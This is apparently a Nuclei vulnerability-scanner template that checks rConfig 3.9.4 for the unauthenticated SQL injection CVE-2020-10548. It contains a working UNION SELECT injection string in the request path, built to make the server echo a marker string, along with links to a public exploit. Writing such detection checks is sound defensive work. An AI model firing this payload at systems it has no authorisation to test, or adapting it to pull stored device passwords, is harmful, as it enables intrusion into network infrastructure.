id: CVE-2020-10548

info:
  name: rConfig 3.9.4 - SQL Injection
  author: madrobot
  severity: critical
  description: rConfig 3.9.4 and previous versions have unauthenticated devices.inc.php SQL injection. Because nodes' passwords are stored in cleartext by default, this vulnerability leads to lateral movement, granting
    an attacker access to monitored network devices.
  reference:
    - https://github.com/theguly/exploits/blob/master/CVE-2020-10548.py
    - https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-10548
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-10548
    cwe-id: CWE-89,CWE-522
  tags: cve,cve2020,rconfig,sqli

requests:
  - method: GET
    path:
      - "{{BaseURL}}/devices.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "[project-discovery]"
        part: body

# Enhanced by mp on 2022/04/07